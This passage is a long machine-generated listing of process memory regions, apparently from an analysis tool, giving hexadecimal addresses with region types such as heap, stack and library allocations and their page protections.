page read and write
|
||
262432A0000
|
heap
|
page read and write
|
||
7FF847930000
|
trusted library allocation
|
page read and write
|
||
6AB070B000
|
stack
|
page read and write
|
||
1E19FFA0000
|
heap
|
page read and write
|
||
1E1A004E000
|
heap
|
page read and write
|
||
1733EF18000
|
heap
|
page read and write
|
||
28C8769D000
|
heap
|
page read and write
|
||
18A64FB5000
|
heap
|
page read and write
|
||
22AE13CA000
|
heap
|
page read and write
|
||
28C88B34000
|
heap
|
page read and write
|
||
1BF4F6F1000
|
heap
|
page read and write
|
||
7FF73AE4E000
|
unkown
|
page read and write
|
||
1619A3FD000
|
heap
|
page read and write
|
||
28C87C5D000
|
heap
|
page read and write
|
||
7FF847A83000
|
trusted library allocation
|
page read and write
|
||
B4AF8FE000
|
stack
|
page read and write
|
||
23315750000
|
heap
|
page read and write
|
||
1CCD86D1000
|
heap
|
page read and write
|
||
15372EF0000
|
trusted library allocation
|
page read and write
|
||
199D3D25000
|
heap
|
page read and write
|
||
7FF8B9841000
|
unkown
|
page execute and read and write
|
||
1436DBF7000
|
heap
|
page read and write
|
||
7FF8B8CC2000
|
unkown
|
page execute and write copy
|
||
1436DC7D000
|
heap
|
page read and write
|
||
28E2CEA4000
|
heap
|
page read and write
|
||
1429B990000
|
heap
|
page read and write
|
||
98A0AFF000
|
unkown
|
page read and write
|
||
14B35533000
|
heap
|
page read and write
|
||
28C88738000
|
heap
|
page read and write
|
||
15371619000
|
heap
|
page read and write
|
||
1436DC75000
|
heap
|
page read and write
|
||
28C88F89000
|
heap
|
page read and write
|
||
15371745000
|
heap
|
page read and write
|
||
28C87DA6000
|
heap
|
page read and write
|
||
1BC8A89E000
|
heap
|
page read and write
|
||
1F23A920000
|
heap
|
page read and write
|
||
D0F79F5000
|
stack
|
page read and write
|
||
B4AF9FE000
|
stack
|
page read and write
|
||
8244FE000
|
stack
|
page read and write
|
||
7DF46D2D0000
|
trusted library allocation
|
page execute and read and write
|
||
1429BA49000
|
heap
|
page read and write
|
||
E8CBA7F000
|
stack
|
page read and write
|
||
14B35AAA000
|
heap
|
page read and write
|
||
B4AF558000
|
stack
|
page read and write
|
||
28C87D68000
|
heap
|
page read and write
|
||
28C87D68000
|
heap
|
page read and write
|
||
28C87CE1000
|
heap
|
page read and write
|
||
1436DC00000
|
heap
|
page read and write
|
||
7FF8A8142000
|
unkown
|
page execute and read and write
|
||
28C87CA8000
|
heap
|
page read and write
|
||
257A3138000
|
heap
|
page read and write
|
||
2624305A000
|
heap
|
page read and write
|
||
28C87DCA000
|
heap
|
page read and write
|
||
28E2CD30000
|
heap
|
page read and write
|
||
1429B970000
|
heap
|
page read and write
|
||
14B35A72000
|
heap
|
page read and write
|
||
199D3D20000
|
heap
|
page read and write
|
||
18D018C1000
|
heap
|
page read and write
|
||
28C88DA0000
|
heap
|
page read and write
|
||
28C87C9B000
|
heap
|
page read and write
|
||
28C88680000
|
direct allocation
|
page read and write
|
||
28E2D499000
|
heap
|
page read and write
|
||
28810FF000
|
stack
|
page read and write
|
||
173422D1000
|
heap
|
page read and write
|
||
1CCD86C4000
|
heap
|
page read and write
|
||
1CCD86C4000
|
heap
|
page read and write
|
||
7FF8B7E01000
|
unkown
|
page execute read
|
||
28C88B61000
|
heap
|
page read and write
|
||
28C88F10000
|
direct allocation
|
page read and write
|
||
1436D9ED000
|
heap
|
page read and write
|
||
28C871D0000
|
direct allocation
|
page read and write
|
||
28E2D4A7000
|
heap
|
page read and write
|
||
B0631FF000
|
stack
|
page read and write
|
||
28C88B3F000
|
heap
|
page read and write
|
||
28C87CD4000
|
heap
|
page read and write
|
||
28C87C68000
|
heap
|
page read and write
|
||
7FF73AE3B000
|
unkown
|
page readonly
|
||
25CAEB61000
|
heap
|
page read and write
|
||
20C0AD60000
|
heap
|
page read and write
|
||
21D4D841000
|
heap
|
page read and write
|
||
7FF8B8CF1000
|
unkown
|
page execute and write copy
|
||
1E1A0044000
|
heap
|
page read and write
|
||
28C88791000
|
heap
|
page read and write
|
||
28C88650000
|
direct allocation
|
page read and write
|
||
173422B8000
|
heap
|
page read and write
|
||
1E1A004B000
|
heap
|
page read and write
|
||
28E2CFB7000
|
heap
|
page read and write
|
||
257A3126000
|
heap
|
page read and write
|
||
1E1A0653000
|
heap
|
page read and write
|
||
28C88630000
|
direct allocation
|
page read and write
|
||
15372F17000
|
heap
|
page execute and read and write
|
||
28C876F5000
|
heap
|
page read and write
|
||
18D018B8000
|
heap
|
page read and write
|
||
1436D9FD000
|
heap
|
page read and write
|
||
18EBB818000
|
heap
|
page read and write
|
||
7FF8A8552000
|
unkown
|
page execute and read and write
|
||
26CD27E1000
|
heap
|
page read and write
|
||
7FF8477B0000
|
trusted library allocation
|
page execute and read and write
|
||
C0A65CE000
|
stack
|
page read and write
|
||
28CC32B0000
|
heap
|
page read and write
|
||
20C0AC30000
|
heap
|
page read and write
|
||
28816BC000
|
stack
|
page read and write
|
||
16191C81000
|
trusted library allocation
|
page read and write
|
||
28C87CA8000
|
heap
|
page read and write
|
||
28C88852000
|
heap
|
page read and write
|
||
15371590000
|
heap
|
page read and write
|
||
28C8876B000
|
heap
|
page read and write
|
||
1CCD86D1000
|
heap
|
page read and write
|
||
22AE13C2000
|
heap
|
page read and write
|
||
1619A19A000
|
heap
|
page read and write
|
||
28C88757000
|
heap
|
page read and write
|
||
17341164000
|
heap
|
page read and write
|
||
28C87C88000
|
heap
|
page read and write
|
||
25CAEB4A000
|
heap
|
page read and write
|
||
1CCD86D1000
|
heap
|
page read and write
|
||
262432B0000
|
heap
|
page read and write
|
||
1A96E3C0000
|
heap
|
page read and write
|
||
1BF4F680000
|
heap
|
page read and write
|
||
1BC8A8BC000
|
heap
|
page read and write
|
||
20D5DEC4000
|
heap
|
page read and write
|
||
1BF4F6F1000
|
heap
|
page read and write
|
||
28CC33B0000
|
heap
|
page read and write
|
||
28C88749000
|
heap
|
page read and write
|
||
28E2D477000
|
heap
|
page read and write
|
||
28C87701000
|
heap
|
page read and write
|
||
28FE122A000
|
heap
|
page read and write
|
||
28E2CE45000
|
heap
|
page read and write
|
||
28C87682000
|
heap
|
page read and write
|
||
7FF8A819F000
|
unkown
|
page execute and read and write
|
||
28C87C73000
|
heap
|
page read and write
|
||
28C881F4000
|
direct allocation
|
page read and write
|
||
28E2CFEB000
|
heap
|
page read and write
|
||
28C87C1F000
|
heap
|
page read and write
|
||
28C8769A000
|
heap
|
page read and write
|
||
16181C81000
|
trusted library allocation
|
page read and write
|
||
14B35440000
|
trusted library allocation
|
page read and write
|
||
1530176B000
|
trusted library allocation
|
page read and write
|
||
1CCD86C4000
|
heap
|
page read and write
|
||
7FF73AE11000
|
unkown
|
page execute read
|
||
18EBB0EE000
|
heap
|
page read and write
|
||
28C87D80000
|
heap
|
page read and write
|
||
18EBD0B4000
|
heap
|
page read and write
|
||
161801B7000
|
heap
|
page read and write
|
||
48A34FF000
|
unkown
|
page read and write
|
||
7FF8B8F70000
|
unkown
|
page readonly
|
||
28FE13F0000
|
heap
|
page read and write
|
||
7FF8A9353000
|
unkown
|
page execute and read and write
|
||
18EBB0A7000
|
heap
|
page read and write
|
||
7FF847830000
|
trusted library allocation
|
page read and write
|
||
14B35AB2000
|
heap
|
page read and write
|
||
28C8822C000
|
direct allocation
|
page read and write
|
||
4B4C13F000
|
stack
|
page read and write
|
||
7FF8479B0000
|
trusted library allocation
|
page read and write
|
||
1436DBFA000
|
heap
|
page read and write
|
||
17341166000
|
heap
|
page read and write
|
||
28C87DAA000
|
heap
|
page read and write
|
||
2109CFF000
|
stack
|
page read and write
|
||
1F23A7E0000
|
heap
|
page read and write
|
||
234DABAA000
|
heap
|
page read and write
|
||
1BC8A8CA000
|
heap
|
page read and write
|
||
28E2ED10000
|
heap
|
page read and write
|
||
1E1A0058000
|
heap
|
page read and write
|
||
14B35A94000
|
heap
|
page read and write
|
||
28E2CE47000
|
heap
|
page read and write
|
||
28E2CE76000
|
heap
|
page read and write
|
||
28E2CD50000
|
heap
|
page read and write
|
||
16183594000
|
trusted library allocation
|
page read and write
|
||
B6EEAFF000
|
stack
|
page read and write
|
||
173409F0000
|
heap
|
page read and write
|
||
15371665000
|
heap
|
page read and write
|
||
28C87CA8000
|
heap
|
page read and write
|
||
26CD2770000
|
heap
|
page read and write
|
||
28C87DAA000
|
heap
|
page read and write
|
||
28C87830000
|
direct allocation
|
page read and write
|
||
15373070000
|
heap
|
page read and write
|
||
28E2CDF7000
|
heap
|
page read and write
|
||
1F23DB90000
|
direct allocation
|
page read and write
|
||
1CCD86C4000
|
heap
|
page read and write
|
||
28C87C90000
|
heap
|
page read and write
|
||
7FF8B8B30000
|
unkown
|
page execute and read and write
|
||
15373593000
|
heap
|
page read and write
|
||
17342208000
|
heap
|
page read and write
|
||
28C87302000
|
heap
|
page read and write
|
||
1CCD86C4000
|
heap
|
page read and write
|
||
28C87C23000
|
heap
|
page read and write
|
||
28C87DE6000
|
heap
|
page read and write
|
||
28C87D04000
|
heap
|
page read and write
|
||
288173E000
|
stack
|
page read and write
|
||
28C88DE6000
|
heap
|
page read and write
|
||
28C88916000
|
heap
|
page read and write
|
||
7FF84774C000
|
trusted library allocation
|
page execute and read and write
|
||
1733EFC9000
|
heap
|
page read and write
|
||
15372F60000
|
heap
|
page read and write
|
||
28CC32E2000
|
heap
|
page read and write
|
||
1E19FFC3000
|
heap
|
page read and write
|
||
234DABC0000
|
heap
|
page read and write
|
||
28C88A6C000
|
heap
|
page read and write
|
||
153734D0000
|
heap
|
page read and write
|
||
28C87CA0000
|
heap
|
page read and write
|
||
7FF847880000
|
trusted library allocation
|
page execute and read and write
|
||
1CCD86D0000
|
heap
|
page read and write
|
||
28C87C76000
|
heap
|
page read and write
|
||
28C88806000
|
heap
|
page read and write
|
||
28C87CB0000
|
heap
|
page read and write
|
||
BF7F3DC000
|
stack
|
page read and write
|
||
5CB18FB000
|
stack
|
page read and write
|
||
173422B8000
|
heap
|
page read and write
|
||
28C88CDF000
|
heap
|
page read and write
|
||
1BC8A8B7000
|
heap
|
page read and write
|
||
28E2CFBA000
|
heap
|
page read and write
|
||
246E4FC7000
|
heap
|
page read and write
|
||
28C876DA000
|
heap
|
page read and write
|
||
17342283000
|
heap
|
page read and write
|
||
18EBB0F4000
|
heap
|
page read and write
|
||
28C877E1000
|
heap
|
page read and write
|
||
28C88284000
|
direct allocation
|
page read and write
|
||
17341A9D000
|
heap
|
page read and write
|
||
28E2CE20000
|
heap
|
page read and write
|
||
28C87800000
|
heap
|
page read and write
|
||
28C87CA2000
|
heap
|
page read and write
|
||
7FF8478D0000
|
trusted library allocation
|
page read and write
|
||
28C87C57000
|
heap
|
page read and write
|
||
1436DA32000
|
heap
|
page read and write
|
||
1CCD86C3000
|
heap
|
page read and write
|
||
28C87185000
|
heap
|
page read and write
|
||
1F23C170000
|
direct allocation
|
page read and write
|
||
2109BFF000
|
unkown
|
page read and write
|
||
1E1A1EED000
|
heap
|
page read and write
|
||
28C87C73000
|
heap
|
page read and write
|
||
1F23A76C000
|
heap
|
page read and write
|
||
1CCD86C4000
|
heap
|
page read and write
|
||
28C87C2E000
|
heap
|
page read and write
|
||
28C88A40000
|
heap
|
page read and write
|
||
14B35512000
|
heap
|
page read and write
|
||
18EBB30B000
|
heap
|
page read and write
|
||
18D018C1000
|
heap
|
page read and write
|
||
28C88862000
|
heap
|
page read and write
|
||
28C858A0000
|
heap
|
page readonly
|
||
28C87D6D000
|
heap
|
page read and write
|
||
28E2ED12000
|
heap
|
page read and write
|
||
1F23A6A0000
|
heap
|
page read and write
|
||
1BC8A9B5000
|
heap
|
page read and write
|
||
1F23A766000
|
heap
|
page read and write
|
||
1436FAC0000
|
heap
|
page read and write
|
||
9CB02FF000
|
stack
|
page read and write
|
||
14B353F0000
|
heap
|
page read and write
|
||
257A33C0000
|
heap
|
page read and write
|
||
28C877E4000
|
heap
|
page read and write
|
||
28C87CA0000
|
heap
|
page read and write
|
||
1F23DD30000
|
direct allocation
|
page read and write
|
||
23315540000
|
heap
|
page read and write
|
||
1733EEC0000
|
heap
|
page read and write
|
||
28C87D68000
|
heap
|
page read and write
|
||
1F23DD39000
|
direct allocation
|
page read and write
|
||
7FF8A8F2A000
|
unkown
|
page read and write
|
||
1E1A0674000
|
heap
|
page read and write
|
||
28C88738000
|
heap
|
page read and write
|
||
28C88B85000
|
heap
|
page read and write
|
||
18A64C00000
|
heap
|
page read and write
|
||
1F23A770000
|
heap
|
page read and write
|
||
26CD27E1000
|
heap
|
page read and write
|
||
28C87C6B000
|
heap
|
page read and write
|
||
28C87D8A000
|
heap
|
page read and write
|
||
4D5CC7F000
|
stack
|
page read and write
|
||
28C87C68000
|
heap
|
page read and write
|
||
16191F78000
|
trusted library allocation
|
page read and write
|
||
1436D9ED000
|
heap
|
page read and write
|
||
1BF4F7D0000
|
heap
|
page read and write
|
||
28E2D4A2000
|
heap
|
page read and write
|
||
1AC9F6BA000
|
heap
|
page read and write
|
||
28C88B6D000
|
heap
|
page read and write
|
||
7FF8A81A4000
|
unkown
|
page execute and read and write
|
||
1AC9F5E0000
|
heap
|
page read and write
|
||
1D6082E0000
|
heap
|
page read and write
|
||
18EBB80F000
|
heap
|
page read and write
|
||
7FF8478D0000
|
trusted library allocation
|
page read and write
|
||
28C88986000
|
heap
|
page read and write
|
||
28E2D499000
|
heap
|
page read and write
|
||
28C8800C000
|
direct allocation
|
page read and write
|
||
28C87D3E000
|
heap
|
page read and write
|
||
7FF8A9355000
|
unkown
|
page execute and read and write
|
||
7FF847AE0000
|
trusted library allocation
|
page read and write
|
||
7FF8A92D1000
|
unkown
|
page execute and read and write
|
||
28E2CEB3000
|
heap
|
page read and write
|
||
15300235000
|
trusted library allocation
|
page read and write
|
||
1AC9F6AD000
|
heap
|
page read and write
|
||
16182E20000
|
trusted library allocation
|
page read and write
|
||
1CCD86C4000
|
heap
|
page read and write
|
||
1429BCD5000
|
heap
|
page read and write
|
||
1436DBF0000
|
heap
|
page read and write
|
||
C3ED74B000
|
stack
|
page read and write
|
||
1A96E2C0000
|
heap
|
page read and write
|
||
1E1A0669000
|
heap
|
page read and write
|
||
7FF847851000
|
trusted library allocation
|
page read and write
|
||
1436DBF2000
|
heap
|
page read and write
|
||
1E19FF70000
|
trusted library allocation
|
page read and write
|
||
173422B8000
|
heap
|
page read and write
|
||
1E1A1EE1000
|
heap
|
page read and write
|
||
1CCDA030000
|
heap
|
page read and write
|
||
28C87B5F000
|
heap
|
page read and write
|
||
1733F0B0000
|
heap
|
page read and write
|
||
28C88806000
|
heap
|
page read and write
|
||
14B37321000
|
heap
|
page read and write
|
||
28C877A5000
|
heap
|
page read and write
|
||
14B35A90000
|
heap
|
page read and write
|
||
28C88A19000
|
heap
|
page read and write
|
||
28E2CE22000
|
heap
|
page read and write
|
||
4B4C43E000
|
stack
|
page read and write
|
||
16180310000
|
heap
|
page execute and read and write
|
||
1CCD86D1000
|
heap
|
page read and write
|
||
28C87D11000
|
heap
|
page read and write
|
||
F00A98C000
|
stack
|
page read and write
|
||
28C88B5F000
|
heap
|
page read and write
|
||
22AE13BF000
|
heap
|
page read and write
|
||
20C0AC00000
|
heap
|
page read and write
|
||
173422DC000
|
heap
|
page read and write
|
||
1429B890000
|
heap
|
page read and write
|
||
1B839BF0000
|
heap
|
page read and write
|
||
14B35A97000
|
heap
|
page read and write
|
||
1F23A7A0000
|
heap
|
page read and write
|
||
12F9FEF000
|
stack
|
page read and write
|
||
28E2CE65000
|
heap
|
page read and write
|
||
1F23A867000
|
direct allocation
|
page read and write
|
||
7FF8B9094000
|
unkown
|
page read and write
|
||
22AE13C5000
|
heap
|
page read and write
|
||
1F23DCB1000
|
direct allocation
|
page read and write
|
||
28C88792000
|
heap
|
page read and write
|
||
28C87B52000
|
heap
|
page read and write
|
||
26243030000
|
heap
|
page read and write
|
||
18EBB110000
|
heap
|
page read and write
|
||
15373577000
|
heap
|
page read and write
|
||
257A3100000
|
heap
|
page read and write
|
||
28E2D47C000
|
heap
|
page read and write
|
||
1CCD86D2000
|
heap
|
page read and write
|
||
1F23DB50000
|
direct allocation
|
page read and write
|
||
2545B300000
|
heap
|
page read and write
|
||
28C88B61000
|
heap
|
page read and write
|
||
1F23A75F000
|
heap
|
page read and write
|
||
28C88B51000
|
heap
|
page read and write
|
||
1D608310000
|
heap
|
page read and write
|
||
DFF4EFE000
|
stack
|
page read and write
|
||
15300C35000
|
trusted library allocation
|
page read and write
|
||
97AEFD000
|
stack
|
page read and write
|
||
28C88640000
|
direct allocation
|
page read and write
|
||
173410DC000
|
heap
|
page read and write
|
||
28C88F60000
|
direct allocation
|
page read and write
|
||
15301914000
|
trusted library allocation
|
page read and write
|
||
26CD2AB5000
|
heap
|
page read and write
|
||
23315560000
|
heap
|
page read and write
|
||
28C88B3F000
|
heap
|
page read and write
|
||
28E2CEC2000
|
heap
|
page read and write
|
||
1436DA25000
|
heap
|
page read and write
|
||
14B3553E000
|
heap
|
page read and write
|
||
1BC8A878000
|
heap
|
page read and write
|
||
22AE139B000
|
heap
|
page read and write
|
||
193223A0000
|
heap
|
page read and write
|
||
161801CD000
|
heap
|
page read and write
|
||
28C87B63000
|
heap
|
page read and write
|
||
21AD4620000
|
heap
|
page read and write
|
||
182DF990000
|
heap
|
page read and write
|
||
28C87180000
|
heap
|
page read and write
|
||
1E1A003C000
|
heap
|
page read and write
|
||
28C87CC8000
|
heap
|
page read and write
|
||
32E16FF000
|
unkown
|
page read and write
|
||
1EE628BA000
|
heap
|
page read and write
|
||
21AD4639000
|
heap
|
page read and write
|
||
14B35410000
|
trusted library allocation
|
page read and write
|
||
7FF8A81B1000
|
unkown
|
page execute and read and write
|
||
1436DBFB000
|
heap
|
page read and write
|
||
1C7FBA61000
|
heap
|
page read and write
|
||
7FF8A9388000
|
unkown
|
page execute and read and write
|
||
5CB1AFF000
|
stack
|
page read and write
|
||
14B3543A000
|
heap
|
page read and write
|
||
28C8828C000
|
direct allocation
|
page read and write
|
||
97B07F000
|
stack
|
page read and write
|
||
28C87800000
|
heap
|
page read and write
|
||
28C87352000
|
heap
|
page read and write
|
||
28C88140000
|
direct allocation
|
page read and write
|
||
28C87D78000
|
heap
|
page read and write
|
||
17341166000
|
heap
|
page read and write
|
||
234DADB0000
|
heap
|
page read and write
|
||
28C87C90000
|
heap
|
page read and write
|
||
14B3732E000
|
heap
|
page read and write
|
||
1D608349000
|
heap
|
page read and write
|
||
28C88852000
|
heap
|
page read and write
|
||
1436DC7E000
|
heap
|
page read and write
|
||
28C88620000
|
direct allocation
|
page read and write
|
||
1EE13960000
|
heap
|
page read and write
|
||
7FF7F7F09000
|
unkown
|
page write copy
|
||
28C87C77000
|
heap
|
page read and write
|
||
97AF7F000
|
stack
|
page read and write
|
||
B4AF5DF000
|
stack
|
page read and write
|
||
26CD27C0000
|
heap
|
page read and write
|
||
7FF8479C0000
|
trusted library allocation
|
page read and write
|
||
C0A9A1F000
|
stack
|
page read and write
|
||
4D5CBFE000
|
stack
|
page read and write
|
||
15301BF2000
|
trusted library allocation
|
page read and write
|
||
28C87D33000
|
heap
|
page read and write
|
||
28C88A33000
|
heap
|
page read and write
|
||
28E2CE45000
|
heap
|
page read and write
|
||
28C87CA8000
|
heap
|
page read and write
|
||
28C88650000
|
direct allocation
|
page read and write
|
||
28C886F0000
|
direct allocation
|
page read and write
|
||
15373522000
|
heap
|
page read and write
|
||
257A3136000
|
heap
|
page read and write
|
||
1436D998000
|
heap
|
page read and write
|
||
7FF8477C0000
|
trusted library allocation
|
page execute and read and write
|
||
15373750000
|
heap
|
page execute and read and write
|
||
1E1A1EEE000
|
heap
|
page read and write
|
||
1E1A0020000
|
heap
|
page read and write
|
||
7FF7F7E80000
|
unkown
|
page readonly
|
||
1E1A01BB000
|
heap
|
page read and write
|
||
7FF847760000
|
trusted library allocation
|
page execute and read and write
|
||
28C87358000
|
heap
|
page read and write
|
||
1C7FB8C0000
|
heap
|
page read and write
|
||
1CCD86C4000
|
heap
|
page read and write
|
||
28E2D49F000
|
heap
|
page read and write
|
||
22AE1395000
|
heap
|
page read and write
|
||
1F23A78A000
|
heap
|
page read and write
|
||
28C87B75000
|
heap
|
page read and write
|
||
D0F7DFF000
|
stack
|
page read and write
|
||
6764FF000
|
unkown
|
page read and write
|
||
28C89460000
|
heap
|
page read and write
|
||
18EBB6A0000
|
heap
|
page read and write
|
||
18EBB0E6000
|
heap
|
page read and write
|
||
28C88B51000
|
heap
|
page read and write
|
||
1E19FFF7000
|
heap
|
page read and write
|
||
21D4D82A000
|
heap
|
page read and write
|
||
27258B08000
|
heap
|
page read and write
|
||
1F23A76C000
|
heap
|
page read and write
|
||
1436DA25000
|
heap
|
page read and write
|
||
14B35435000
|
heap
|
page read and write
|
||
28C87C90000
|
heap
|
page read and write
|
||
18D017E0000
|
heap
|
page read and write
|
||
28C882A4000
|
direct allocation
|
page read and write
|
||
2545B380000
|
heap
|
page read and write
|
||
1CCD86D1000
|
heap
|
page read and write
|
||
2BAD9900000
|
heap
|
page read and write
|
||
1CCD86C4000
|
heap
|
page read and write
|
||
28C88916000
|
heap
|
page read and write
|
||
7FF8BA240000
|
unkown
|
page readonly
|
||
32E17FF000
|
stack
|
page read and write
|
||
28E2CE46000
|
heap
|
page read and write
|
||
28C88B6F000
|
heap
|
page read and write
|
||
1A96E560000
|
heap
|
page read and write
|
||
28C87C67000
|
heap
|
page read and write
|
||
7FF8B93D7000
|
unkown
|
page execute and write copy
|
||
1436E129000
|
heap
|
page read and write
|
||
18EBB0FD000
|
heap
|
page read and write
|
||
B2C22FC000
|
stack
|
page read and write
|
||
28E2CEB3000
|
heap
|
page read and write
|
||
28C87B62000
|
heap
|
page read and write
|
||
2720DDE5000
|
heap
|
page read and write
|
||
16180300000
|
trusted library allocation
|
page read and write
|
||
28E2CFE0000
|
heap
|
page read and write
|
||
28C882A8000
|
direct allocation
|
page read and write
|
||
7FF84785A000
|
trusted library allocation
|
page read and write
|
||
18A64C0B000
|
heap
|
page read and write
|
||
28C87C49000
|
heap
|
page read and write
|
||
18EBB0D2000
|
heap
|
page read and write
|
||
15373670000
|
heap
|
page read and write
|
||
28E2D4A5000
|
heap
|
page read and write
|
||
28C88680000
|
direct allocation
|
page read and write
|
||
28C88A1B000
|
heap
|
page read and write
|
||
1F23A7E0000
|
heap
|
page read and write
|
||
28C877D6000
|
heap
|
page read and write
|
||
20D5DEAE000
|
heap
|
page read and write
|
||
1E1A0057000
|
heap
|
page read and write
|
||
7FF8A81D2000
|
unkown
|
page execute and read and write
|
||
28C877BA000
|
heap
|
page read and write
|
||
18EBB0CA000
|
heap
|
page read and write
|
||
4D5FEDC000
|
stack
|
page read and write
|
||
161801F7000
|
heap
|
page read and write
|
||
28C87D79000
|
heap
|
page read and write
|
||
1E1A005F000
|
heap
|
page read and write
|
||
28C88B64000
|
heap
|
page read and write
|
||
161829E9000
|
trusted library allocation
|
page read and write
|
||
28C87800000
|
heap
|
page read and write
|
||
7FF8479E9000
|
trusted library allocation
|
page read and write
|
||
1D6082F0000
|
heap
|
page read and write
|
||
1CCD8660000
|
heap
|
page readonly
|
||
28E2CEAA000
|
heap
|
page read and write
|
||
1BD202D0000
|
heap
|
page read and write
|
||
7FF847845000
|
trusted library allocation
|
page read and write
|
||
1C7FBA4A000
|
heap
|
page read and write
|
||
28C87CB8000
|
heap
|
page read and write
|
||
1436D9E3000
|
heap
|
page read and write
|
||
14B35510000
|
heap
|
page read and write
|
||
28C88794000
|
heap
|
page read and write
|
||
28E2CE31000
|
heap
|
page read and write
|
||
7FF8A81B0000
|
unkown
|
page readonly
|
||
28C87351000
|
heap
|
page read and write
|
||
28C876A9000
|
heap
|
page read and write
|
||
28C87D36000
|
heap
|
page read and write
|
||
1436F9BD000
|
heap
|
page read and write
|
||
28E2CDF7000
|
heap
|
page read and write
|
||
1429BA50000
|
heap
|
page read and write
|
||
28C88A1B000
|
heap
|
page read and write
|
||
7FF8476B4000
|
trusted library allocation
|
page read and write
|
||
1CCD86C8000
|
heap
|
page read and write
|
||
28C876B9000
|
heap
|
page read and write
|
||
28C88B34000
|
heap
|
page read and write
|
||
28C898F0000
|
direct allocation
|
page read and write
|
||
21AD4530000
|
heap
|
page read and write
|
||
28C87E4B000
|
heap
|
page read and write
|
||
1733EF18000
|
heap
|
page read and write
|
||
28C87333000
|
heap
|
page read and write
|
||
7FF73AE3B000
|
unkown
|
page readonly
|
||
28E2CE31000
|
heap
|
page read and write
|
||
1436DBFE000
|
heap
|
page read and write
|
||
28C88A1B000
|
heap
|
page read and write
|
||
7FF8A8091000
|
unkown
|
page execute and read and write
|
||
9CB00FC000
|
stack
|
page read and write
|
||
28C87DA4000
|
heap
|
page read and write
|
||
14B3553E000
|
heap
|
page read and write
|
||
28C87CA0000
|
heap
|
page read and write
|
||
1CCD86C4000
|
heap
|
page read and write
|
||
1E19FFCE000
|
heap
|
page read and write
|
||
28C87C6B000
|
heap
|
page read and write
|
||
18EBB829000
|
heap
|
page read and write
|
||
28C88A4B000
|
heap
|
page read and write
|
||
28C87D78000
|
heap
|
page read and write
|
||
7FF8476A4000
|
trusted library allocation
|
page read and write
|
||
28E2CE6E000
|
heap
|
page read and write
|
||
18EBB260000
|
heap
|
page read and write
|
||
7FF8B8CEF000
|
unkown
|
page execute and read and write
|
||
1EE628A0000
|
heap
|
page read and write
|
||
14B35A7B000
|
heap
|
page read and write
|
||
257A3060000
|
heap
|
page read and write
|
||
7FF8A8090000
|
unkown
|
page readonly
|
||
89020FB000
|
stack
|
page read and write
|
||
7FF8B9090000
|
unkown
|
page execute and read and write
|
||
161801FA000
|
heap
|
page read and write
|
||
1619A3B0000
|
heap
|
page read and write
|
||
28C88B6F000
|
heap
|
page read and write
|
||
28C88A6C000
|
heap
|
page read and write
|
||
18EBB821000
|
heap
|
page read and write
|
||
1EE13691000
|
heap
|
page read and write
|
||
28C88B3F000
|
heap
|
page read and write
|
||
28E2CE6E000
|
heap
|
page read and write
|
||
1429BCD0000
|
heap
|
page read and write
|
||
18EBD0A0000
|
heap
|
page read and write
|
||
7FF8A81D8000
|
unkown
|
page execute and read and write
|
||
1436D9A7000
|
heap
|
page read and write
|
||
28E2CFE5000
|
heap
|
page read and write
|
||
18EBB6A3000
|
heap
|
page read and write
|
||
28C87630000
|
heap
|
page read and write
|
||
241A857B000
|
heap
|
page read and write
|
||
1BC8A893000
|
heap
|
page read and write
|
||
1F23A7E0000
|
heap
|
page read and write
|
||
7FF847776000
|
trusted library allocation
|
page execute and read and write
|
||
7FF8B906C000
|
unkown
|
page read and write
|
||
28C87C70000
|
heap
|
page read and write
|
||
28C88A31000
|
heap
|
page read and write
|
||
28C8734B000
|
heap
|
page read and write
|
||
7FF8476AB000
|
trusted library allocation
|
page read and write
|
||
18EBB80F000
|
heap
|
page read and write
|
||
28C88B49000
|
heap
|
page read and write
|
||
C0A63DD000
|
stack
|
page read and write
|
||
1BC8A8A1000
|
heap
|
page read and write
|
||
D5385FF000
|
unkown
|
page read and write
|
||
1E1A003D000
|
heap
|
page read and write
|
||
28C88B7F000
|
heap
|
page read and write
|
||
1EE628C0000
|
heap
|
page read and write
|
||
28C87A31000
|
heap
|
page read and write
|
||
28C8767C000
|
heap
|
page read and write
|
||
28C87CA0000
|
heap
|
page read and write
|
||
7FF8A8147000
|
unkown
|
page execute and read and write
|
||
18D01810000
|
heap
|
page read and write
|
||
1AC9F6B5000
|
heap
|
page read and write
|
||
28817BB000
|
stack
|
page read and write
|
||
1D60833A000
|
heap
|
page read and write
|
||
1F23DB70000
|
direct allocation
|
page read and write
|
||
28C88FA0000
|
direct allocation
|
page read and write
|
||
1F23A76A000
|
heap
|
page read and write
|
||
193223A0000
|
heap
|
page read and write
|
||
28C87C73000
|
heap
|
page read and write
|
||
28C87C67000
|
heap
|
page read and write
|
||
1BC8A8A1000
|
heap
|
page read and write
|
||
E8CB97E000
|
stack
|
page read and write
|
||
14B35AB2000
|
heap
|
page read and write
|
||
7FF73AE52000
|
unkown
|
page readonly
|
||
28C8773A000
|
heap
|
page read and write
|
||
7FF8A85EA000
|
unkown
|
page execute and read and write
|
||
1F23DC50000
|
direct allocation
|
page read and write
|
||
1734117B000
|
heap
|
page read and write
|
||
28C88A17000
|
heap
|
page read and write
|
||
1BC8A8AB000
|
heap
|
page read and write
|
||
1E1A01BE000
|
heap
|
page read and write
|
||
1537356F000
|
heap
|
page read and write
|
||
597FA7C000
|
stack
|
page read and write
|
||
1BF4F6F1000
|
heap
|
page read and write
|
||
7FF8A8B1F000
|
unkown
|
page execute and read and write
|
||
17340880000
|
heap
|
page read and write
|
||
28C8878F000
|
heap
|
page read and write
|
||
28C886D0000
|
direct allocation
|
page read and write
|
||
7FF847B10000
|
trusted library allocation
|
page read and write
|
||
28C87B6F000
|
heap
|
page read and write
|
||
1436DBB0000
|
trusted library allocation
|
page read and write
|
||
153016A3000
|
trusted library allocation
|
page read and write
|
||
20C0AD30000
|
heap
|
page read and write
|
||
1CCD86D1000
|
heap
|
page read and write
|
||
28C88270000
|
direct allocation
|
page read and write
|
||
67687CC000
|
stack
|
page read and write
|
||
18EBB2A0000
|
trusted library allocation
|
page read and write
|
||
1AC9F850000
|
heap
|
page read and write
|
||
4B4BF7F000
|
stack
|
page read and write
|
||
1429BA48000
|
heap
|
page read and write
|
||
6761FC000
|
stack
|
page read and write
|
||
28FE11D0000
|
heap
|
page read and write
|
||
1AC9F6BA000
|
heap
|
page read and write
|
||
18EBB821000
|
heap
|
page read and write
|
||
7FF8478B0000
|
trusted library allocation
|
page read and write
|
||
1436DBFE000
|
heap
|
page read and write
|
||
7FF847756000
|
trusted library allocation
|
page read and write
|
||
28C87C76000
|
heap
|
